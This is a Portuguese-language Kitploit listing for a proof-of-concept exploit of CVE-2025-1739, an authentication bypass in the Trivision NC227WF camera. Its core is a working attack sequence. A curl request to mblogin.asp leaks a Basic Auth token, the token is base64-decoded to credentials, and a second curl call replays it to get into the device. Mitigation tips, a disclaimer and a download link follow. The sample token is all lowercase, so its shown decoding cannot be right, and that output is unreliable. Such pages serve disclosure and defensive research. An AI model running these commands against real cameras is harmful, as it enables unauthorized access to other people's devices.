Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
Ferramentas/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-1738 & CVE-2025-1739 — PoC da Câmera Trivision NC227WF

📋 Visão Geral

CVECVSS v3.1PontuaçãoCWETipo
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Bypass de autenticação via vazamento do Basic Auth

🔓 CVE-2025-1739 — Exposição do código Basic Auth / Bypass de autenticação (CWE-288)

Descrição

A câmera expõe um token de autenticação Basic Authentication válido codificado em Base64 por meio do endpoint mblogin.asp. Esse token pode ser trivialmente decodificado e reutilizado para obter acesso não autorizado ao dispositivo — sem necessidade de conhecer a senha.

  • Vetor de ataque: Rede adjacente (AV:A)
  • Pontuação CVSS: 7.1
  • CWE: CWE-288 (Contorno de autenticação usando um caminho ou canal alternativo)

Payload

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
image

Exemplo de resposta

A resposta contém um token Basic Auth válido:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

Decodificando o token

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

Reutilizando o token

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ Mitigação

  • Atualize o firmware se uma versão corrigida estiver disponível pela Trivision.
  • Isole a câmera em uma VLAN dedicada, sem acesso externo.
  • Proteja com firewall a porta de gerenciamento da câmera contra segmentos de rede não confiáveis.
  • Altere as credenciais padrão e rotacione as senhas regularmente.
  • Monitore acessos inesperados a activex_pal.asp e mblogin.asp.

⚖️ Aviso legal

Este repositório é apenas para pesquisa de segurança educacional e autorizada. Os autores não são responsáveis por qualquer uso indevido. Sempre obtenha permissão explícita antes de testar qualquer dispositivo.

Baixar ferramenta